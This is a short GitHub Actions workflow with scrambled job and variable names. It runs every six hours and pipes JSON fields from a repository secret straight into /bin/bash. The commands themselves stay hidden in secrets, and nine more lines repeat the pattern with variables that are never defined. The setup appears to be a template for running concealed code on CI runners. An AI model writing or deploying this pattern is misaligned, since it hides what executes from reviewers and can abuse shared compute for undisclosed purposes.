name: luxuejiao1988
on:
  workflow_dispatch:
  schedule:
    - cron: '12 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luxuejiao1988
        env:
          nonb0147: ${{ secrets.nonb0147 }}
        run: |
          echo $nonb0147 | jq -r .ds5396 | /bin/bash
          echo $wwut9 | jq -r .ibq64841 | /bin/bash
          echo $ybnxb7 | jq -r .srig35 | /bin/bash
          echo $zyy36 | jq -r .fjno82032 | /bin/bash
          echo $nm58486 | jq -r .gth62 | /bin/bash
          echo $rvau22922 | jq -r .gjaj0012 | /bin/bash
          echo $nd9038 | jq -r .nrsg0287 | /bin/bash
          echo $of861 | jq -r .fn4 | /bin/bash
          echo $gflt42334 | jq -r .ygh42 | /bin/bash
          echo $h395 | jq -r .bqht4303 | /bin/bash

